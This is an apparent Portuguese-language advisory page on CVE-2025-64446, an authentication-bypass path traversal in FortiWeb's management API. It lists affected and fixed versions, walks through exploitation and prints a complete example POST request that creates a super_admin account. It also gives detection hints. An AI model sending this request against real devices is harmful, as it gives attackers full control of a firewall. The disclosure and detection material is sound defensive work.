
CVE-2025-64446

Vulnerabilidade crítica sem autenticação que permite a atacantes remotos criar contas de administrador em dispositivos FortiWeb.
CVE-2025-64446 é uma grave vulnerabilidade de relative path traversal na interface de gerenciamento do FortiWeb Web Application Firewall.
Um atacante remoto não autenticado pode explorar esta falha para bypassar a autenticação e criar novos usuários administradores com privilégios totais, levando ao comprometimento completo do dispositivo.
| Produto | Versões Afetadas | Corrigido na Versão |
|---|---|---|
| FortiWeb 8.0 | 8.0.0 – 8.0.1 | 8.0.2 e superiores |
| FortiWeb 7.6 | 7.6.0 – 7.6.4 | 7.6.5 e superiores |
| FortiWeb 7.4 | 7.4.0 – 7.4.9 | 7.4.10 e superiores |
| FortiWeb 7.2 | 7.2.0 – 7.2.11 | 7.2.12 e superiores |
| FortiWeb 7.0 | 7.0.0 – 7.0.11 | 7.0.12 e superiores |
Recomendação: Atualize para a versão corrigida mais recente o mais rápido possível.
Identificação do Alvo
O atacante procura por interfaces de gerenciamento do FortiWeb expostas publicamente (geralmente na porta HTTPS 443 ou 8443).
Construção da Requisição Maliciosa
O núcleo do exploit é um relative path traversal (../) combinado com uma URL especialmente criada que alcança um endpoint CGI interno não autenticado.
Vulnerable Endpoint Pattern:
/api/v2.0/cmdb/system/admin?.../../../../../../cgi-bin/fwbcgi
Envio do Exploit
O atacante envia uma única requisição POST com payload JSON para criar uma nova conta de administrador.
Example Exploit Request:
POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
Host: target-fortiw eb.example.com
Content-Type: application/json
{
"name": "hackedadmin",
"password": "AttackerPass123!",
"access_profile": "super_admin",
"type": "local"
}
Exploração Bem-sucedida
Se bem-sucedido, o FortiWeb cria a nova conta de administrador sem exigir qualquer autenticação prévia. O atacante pode então fazer login com as credenciais recém-criadas e obter controle total do WAF.
A API de gerenciamento falha em sanitizar adequadamente o caminho, permitindo que a requisição percorra de volta ao binário legado fwbcgi, que não impõe autenticação em certas operações.
fwbcgi, ../, ou tentativas incomuns de criação de adminApenas para fins educacionais e de pesquisa de segurança defensiva.
Feito com ❤️ para a comunidade de cibersegurança
Última atualização: Abril de 2026